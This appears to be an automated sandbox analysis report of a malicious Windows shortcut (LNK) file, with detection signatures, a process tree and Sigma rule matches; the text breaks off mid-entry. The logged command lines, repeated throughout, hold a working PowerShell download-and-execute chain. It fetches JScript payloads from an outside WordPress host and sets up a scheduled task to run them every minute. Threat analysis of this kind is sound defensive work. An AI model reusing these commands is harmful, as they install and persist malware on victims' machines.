Windows Analysis Report
yT6gJFN0SR.lnk

Overview

General Information

Sample name: yT6gJFN0SR.lnk (renamed because original name is a hash value)
Original sample name: d480330c8ee5ab7fb143c23321531474b736e7cca9abe933da41b2fe2472863c.lnk
Analysis ID: 1567191
MD5: a8adbb0f006cbb7a70d7c2dcb0e2cff6
SHA1: 38f9fbf5a68943dc8f265191bb302722afed95d7
SHA256: d480330c8ee5ab7fb143c23321531474b736e7cca9abe933da41b2fe2472863c
Tags: lnk, www-italialife24-it, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Powershell download and execute
AI detected suspicious sample
Machine Learning detection for sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 6652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8; MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7288 cmdline: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8 MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • wscript.exe (PID: 7348 cmdline: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7428 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7604 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 7620 cmdline: "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 7872 cmdline: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 8104 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 8120 cmdline: "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 1660 cmdline: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6256 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4016 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 368 cmdline: "C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 6652 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
    Process Memory Space: powershell.exe PID: 6652 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | $b3: ::UTF8.GetString(
    Source | Rule | Description | Author | Strings
    amsi64_6652.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

      System Summary

      Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6652, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, ProcessId: 7288, ProcessName: schtasks.exe
      Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, ProcessId: 7348, ProcessName: wscript.exe
      Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6652, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, ProcessId: 7288, ProcessName: schtasks.exe
      Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js ", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js ", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7348, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js ", ProcessId: 7428, ProcessName: powershell.exe
      Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, ProcessId: 7348, ProcessName: wscript.exe
      Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, ProcessId: 7348, ProcessName: wscript.exe
      Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6652, TargetFilename: C:\Users\user\AppData\Local\Temp\epZTzlYAtsWrS0.js
      Source: Process started; Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, ProcessId: 6652, ProcessName: powershell.exe
      Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, ProcessId: 6652, ProcessName: powershell.exe
      Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6652, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, ProcessId: 7288, ProcessName: schtasks.exe
      Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, ProcessId: 6652, ProcessName: powershell.exe
      Source: Process started; Author: frack113, Nasreddine Bencherchali; Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6652, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8, ProcessId: 7288, ProcessName: schtasks.exe
      Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js, ProcessId: 7348, ProcessName: wscript.exe
      Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = 